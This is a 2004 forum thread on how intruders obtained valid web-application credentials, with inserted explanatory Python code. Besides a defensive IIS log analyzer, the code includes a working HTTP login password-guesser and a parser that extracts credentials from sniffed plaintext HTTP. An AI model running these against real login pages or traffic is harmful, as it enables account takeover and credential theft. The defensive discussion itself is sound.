Solved

Password Hacking question

Posted on 2004-03-25
4,590 Views
Last Modified: 2010-04-11
Hello,

Early this morning, someone(s) gained unauthorized entry into our web application using valid login information.

We're trying to determine how they got the login information.

Are there any applications which hackers can use which will make repeated login attempts to an application's login page?
Question by:skbohler
13 Comments
 
LVL 6

Assisted Solution

by:bloemkool1980
bloemkool1980 earned 50 total points
There are plenty of tools like that. But why would you need to know which tool?
It is also very easy to write a script in Perl that does it for you.
If I understand correctly, they did a password-guessing attack, and if this is true it means that you have very weak passwords and very easy-to-guess usernames.
I do not know the names of any of these kinds of tools, but http://packetstormsecurity.org has plenty.

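The kind of script the comment above refers to, as an added example that is not part of the original thread and not one of the tools it names: a minimal HTTP form password-guesser in Python, run against a throwaway login handler started in the same process so that it works offline. The form path /login.asp, the field names username and password, the account steve with its weak password, the wordlist, and the convention that a successful login answers with a 302 redirect while a failed one re-renders the form with 200 are all constructed assumptions for the demo.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import HTTPRedirectHandler, Request, build_opener

# Constructed target account (assumption for the demo): one user, weak password.
ACCOUNTS = {"steve": "summer"}
LOGIN_PATH = "/login.asp"   # assumed form action, not taken from the thread


class LoginHandler(BaseHTTPRequestHandler):
    """Stand-in for the application's HTML login page.

    Success -> 302 to /account.asp; failure -> 200 with the form again.
    (Assumed convention; real applications differ, and the guesser keys on it.)
    """

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode("utf-8", "replace"))
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if self.path == LOGIN_PATH and ACCOUNTS.get(user) == password:
            self.send_response(302)
            self.send_header("Location", "/account.asp")
        else:
            self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # silence per-request logging in the demo


def start_target():
    """Start the throwaway login server on a free localhost port; returns the server."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


class NoRedirect(HTTPRedirectHandler):
    """Surface a 302 as an HTTPError instead of following it: the status is the signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def guess_password(base_url, username, wordlist):
    """Try each candidate against the form; return (password, attempts) or (None, attempts)."""
    opener = build_opener(NoRedirect())
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        data = urlencode({"username": username, "password": candidate}).encode()
        try:
            with opener.open(Request(base_url + LOGIN_PATH, data=data)) as resp:
                status = resp.status
        except HTTPError as err:
            status = err.code
        if status == 302:           # redirect = the assumed "logged in" signal
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    server = start_target()
    url = "http://127.0.0.1:%d" % server.server_address[1]
    print(guess_password(url, "steve", ["123456", "password", "summer", "winter"]))
    server.shutdown()
```

The tools named later in the thread do the same thing with threads and large wordlists, but the mechanics are identical: every candidate is one POST to the login page, so a run of any length leaves a trail of requests from one client IP in the web server log, and an account lockout or rate limit on the login handler is what stops it.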
LVL 38

Accepted Solution

by:Rich Rumble
Rich Rumble earned 75 total points
Yes, plenty. I'd scan yourself with a few of the favorites, and see if you can see how they got in.
GFI LANguard - 30-day trial
http://www.gfi.com/lannetscan/
Nessus - Free
http://www.nessus.org/  (Nessus has a BF capability)

Run MBSA http://www.microsoft.com/technet/security/tools/mbsahome.mspx on the box and see what it recommends

Use those two to determine if you are vulnerable to some of the common and easily exploited flaws in IIS or SQL. Hackers (actually crackers) can get in numerous ways.
1) they crack into a legitimate user of your system, and get their credentials off their PC
2) they exploit IIS or SQL and get in via 2000+ different ways
3) they "brute-force" usernames or passwords until they get a legit one
4) disgruntled former employee - or an insider in your company gives them access
5) your source code reveals or contains an "easy in" for the intruders

Get yourself an IDS system such as Snort or a firewall that can export its logs, so that you may be able to correlate an IP with the time of the login better. Firewall and AV are a must for M$ products (I am assuming you are using IIS, not Apache)
GL!
-rich



LVL 6

Expert Comment

by:bloemkool1980
webcracker is the most popular
http://www.securityfocus.com/tools/706
LVL 6

Expert Comment

by:bloemkool1980
http://www.packetstormsecurity.org/Crackers/indexdate.shtml
Here there are many tools which could help you out.

Author Comment

by:skbohler
Thanks for the initial responses.

Wouldn't the initial invalid attempts show up in both our IIS log files as hits to the login page?

-Steve

Author Comment

by:skbohler
It looks like your responses are addressing attempts to hack into a server, not an application with an HTML login page. No?

-Steve
LVL 38

Expert Comment

by:Rich Rumble
They should log such things. Like I said, there are many, many ways to get a legit username and password. If they did scan your server and find it exploitable, then it's very likely this was their way in; then they gathered a few usernames and passwords... perhaps.
What has been listed are some tools that can look for exploits for your application (GFI, Nessus), and Nessus also has a brute-force capability. Social engineering is a fabulous way to get such information. Without better forensics there is no real way to tell how this info was obtained... too many variables at work here.
Hacking a person's computer that uses your site: it could contain a cached logon cred..
They could have worked for you previously, or they have someone on the inside... perhaps your application was written out-of-house, and a developer used an account or back door to get in.. your imagination is the limit...
-rich
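The check the question keeps coming back to (would the guesses show up in the IIS log, and can an IP be correlated with the time of the login) as an added example in Python; this is not code from the thread or from any tool it names. It parses IIS W3C extended log lines using the #Fields directive, then looks for two patterns per client IP: a burst of failed login POSTs inside a time window (password guessing), and a first login POST that succeeds with no failures before it (the credentials were already known, which is what the poster later reports seeing). The sample log is constructed, and the form path /login.asp, failure answering 200 and success answering 302 are assumptions to be checked against the real application.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions for this example (not from the thread): the form posts to /login.asp,
# a failed login re-renders the form with 200, a successful one redirects with 302.
LOGIN_PATH = "/login.asp"
SUCCESS_STATUS = "302"

# Constructed sample in IIS W3C extended format; not real log data.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-25 03:12:01 10.0.0.7 GET /login.asp - 200
2004-03-25 03:12:09 10.0.0.7 POST /login.asp - 200
2004-03-25 03:12:11 10.0.0.7 POST /login.asp - 200
2004-03-25 03:12:13 10.0.0.7 POST /login.asp - 200
2004-03-25 03:12:15 10.0.0.7 POST /login.asp - 200
2004-03-25 03:12:17 10.0.0.7 POST /login.asp - 200
2004-03-25 03:12:19 10.0.0.7 POST /login.asp - 200
2004-03-25 03:12:21 10.0.0.7 POST /login.asp - 302
2004-03-25 03:12:22 10.0.0.7 GET /account.asp - 200
2004-03-25 03:40:02 203.0.113.9 POST /login.asp - 200
2004-03-25 03:40:15 203.0.113.9 POST /login.asp - 200
2004-03-25 03:40:30 203.0.113.9 POST /login.asp - 302
2004-03-25 04:01:15 192.0.2.44 GET /login.asp - 200
2004-03-25 04:01:20 192.0.2.44 POST /login.asp - 302
2004-03-25 04:01:21 192.0.2.44 GET /account.asp - 200
"""


def parse_w3c(log_text):
    """Yield one dict per data line, keyed by the names in the #Fields directive."""
    fields = None
    for line in log_text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        parts = line.split()
        if len(parts) == len(fields):      # skip truncated lines instead of crashing
            yield dict(zip(fields, parts))


def analyze(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {'guessing': {ip: failures_in_window}, 'single_shot': [(ip, time)]}.

    guessing    : IPs with >= threshold failed login POSTs inside `window`
    single_shot : IPs whose very first login POST succeeded (no guessing seen,
                  so the credentials came from somewhere else)
    """
    posts = defaultdict(list)
    for rec in parse_w3c(log_text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != LOGIN_PATH:
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        posts[rec["c-ip"]].append((ts, rec["sc-status"]))

    guessing, single_shot = {}, []
    for ip, events in posts.items():
        events.sort()
        failures = [ts for ts, status in events if status != SUCCESS_STATUS]
        # longest run of failures that fits inside `window` (sliding window)
        longest, start = 0, 0
        for end in range(len(failures)):
            while failures[end] - failures[start] > window:
                start += 1
            longest = max(longest, end - start + 1)
        if longest >= threshold:
            guessing[ip] = longest
        elif events[0][1] == SUCCESS_STATUS:
            single_shot.append((ip, events[0][0].strftime("%Y-%m-%d %H:%M:%S")))
    return {"guessing": guessing, "single_shot": single_shot}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

The two legitimate-looking patterns in the sample are deliberate: 203.0.113.9 fails twice and then gets in, which is a user mistyping, and 192.0.2.44 logs in on the first try, which is the single-attempt login the poster describes. A burst like 10.0.0.7's is what a guessing tool leaves behind; if the log shows only the second pattern, the guessing either did not happen here or happened somewhere the credentials were also valid, and the firewall or IDS logs for that IP and time are the next place to look.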

Author Comment

by:skbohler
Since the log file shows only one attempt before gaining access through a valid login, it seems that they weren't using any software which keeps trying different things.

Other than learning of login information from a person, piece of paper, etc., are there other ways of obtaining login information? Can they "tap into" communication over the internet and filter out usernames and password strings?

Thanks again,
Steve
LVL 38

Expert Comment

by:Rich Rumble
Not typically, they can't sniff the wire... they can get into a server with an exploit for IIS or Apache; even your app may reveal what it's looking for. Once you've gained access to a server (from being unpatched, or exploited), you can look around for valid usernames and passes in SQL or whatever database (the Windows SAM) they may be stored in. In order to sniff (tap into) they need to be on the same subnet and/or in the same broadcast domain. You can sniff traffic while it's in transit to different places; if an employee of an ISP were to sniff his own traffic, he could easily gain such information if he/she were a "hop" that the info passed through. If you do a tracert to microsoft.com you "hop" through quite a few routers on different ISPs and service providers; any one of those points (hops), anywhere in the world, could in theory "sniff" a communication such as a username and password.

Encrypted communications are the best way of thwarting such "sniffing". HTTPS (HTTP Secure)/SSL is the best way to prevent this from happening easily. Again, there are trojans that install keyloggers, as well as URL monitoring, both with timestamps, so that the keystrokes can be associated with a particular log-in to a URL. This gets around the HTTPS solution. The possibilities are truly endless. For each cure or fix, there are other ways of obtaining the info.
So a user infected with a trojan could unwittingly be giving a hacker this information; there is no real way to track down what has happened to you - again, too many variables...
You're not paranoid if everyone is really out to get you :) If you don't have a firewall, you're asking to be hacked; if you don't run AV you're bound to get infected (with M$ that is)

-rich
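To make the sniffing point in the answer above concrete, an added example that is not from the thread: the parsing an on-path observer (one of the "hops") would apply to a captured TCP payload. It pulls the username and password out of an unencrypted HTTP login, whether sent as a urlencoded form POST or as an HTTP Basic Authorization header (base64 is encoding, not encryption), and returns nothing for the opaque bytes of a TLS session, which is the HTTPS side of the argument. The three payloads, the host names, and the list of form field names it looks for are constructed for the demo.

```python
import base64
from urllib.parse import parse_qs

# Field names a sniffer would look for in a login form (assumption for the demo).
USER_KEYS = ("username", "user", "login", "email", "uid")
PASS_KEYS = ("password", "pass", "passwd", "pwd")

# Constructed payloads, as they would sit in a TCP segment; not real captures.
FORM_POST = (b"POST /login.asp HTTP/1.1\r\n"
             b"Host: www.example.com\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n"
             b"Content-Length: 34\r\n\r\n"
             b"username=steve&password=Spring2004")
BASIC_GET = (b"GET /admin/ HTTP/1.0\r\n"
             b"Host: www.example.com\r\n"
             b"Authorization: Basic " + base64.b64encode(b"admin:letmein") + b"\r\n\r\n")
# First bytes of a TLS handshake record (content type 0x16, version 3.1) followed
# by constructed random-looking bytes: what the same login looks like over HTTPS.
TLS_RECORD = bytes.fromhex("160301002a010000260303") + bytes(range(0xE0, 0x100))


def extract_credentials(payload: bytes):
    """Return {'user', 'password', 'via'} if a plaintext login is visible, else None."""
    head, _, body = payload.partition(b"\r\n\r\n")
    try:
        head_text = head.decode("ascii")
    except UnicodeDecodeError:
        return None                      # binary stream (e.g. TLS): nothing readable
    lines = head_text.split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or not request_line[2].startswith("HTTP/"):
        return None                      # not an HTTP request
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    # Case 1: HTTP Basic auth. Base64 is encoding, not encryption.
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        decoded = base64.b64decode(auth[6:]).decode("utf-8", "replace")
        user, _, password = decoded.partition(":")
        return {"user": user, "password": password, "via": "basic-auth"}

    # Case 2: urlencoded form POST, the usual HTML login page.
    if (request_line[0] == "POST"
            and headers.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        fields = parse_qs(body.decode("utf-8", "replace"))
        user = next((fields[k][0] for k in USER_KEYS if k in fields), None)
        password = next((fields[k][0] for k in PASS_KEYS if k in fields), None)
        if user is not None and password is not None:
            return {"user": user, "password": password, "via": "form-post"}
    return None


if __name__ == "__main__":
    for name, payload in (("form", FORM_POST), ("basic", BASIC_GET), ("tls", TLS_RECORD)):
        print(name, extract_credentials(payload))
```

Anyone who can read the segment, on the local broadcast domain or at an intermediate router, gets the same result, which is why the answer points to HTTPS: the TLS case yields nothing even though the same form field names are inside it. As the answer also notes, that does not help against a keylogger on the user's own machine, which sees the keystrokes before encryption.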

Author Comment

by:skbohler
Thanks for your reply.

The username they used wasn't stored on our web server. Our SQL server database is on another database (on a shared server). Unfortunately I have no way of telling if they hacked into that.

We do have a firewall and have shut off their IP address for now.

Thanks!
LVL 6

Expert Comment

by:bloemkool1980
Anyhow, I do not agree with your decision, as richrumble proposed port scanners, not tools that make web logins.
Sad that you took that as a good answer!
LVL 38

Expert Comment

by:Rich Rumble
Nessus indeed can make web logins; GFI can check for easy passwords if configured correctly. I think the split was fair; there are again too many variables to know for certain. Thanks.
-rich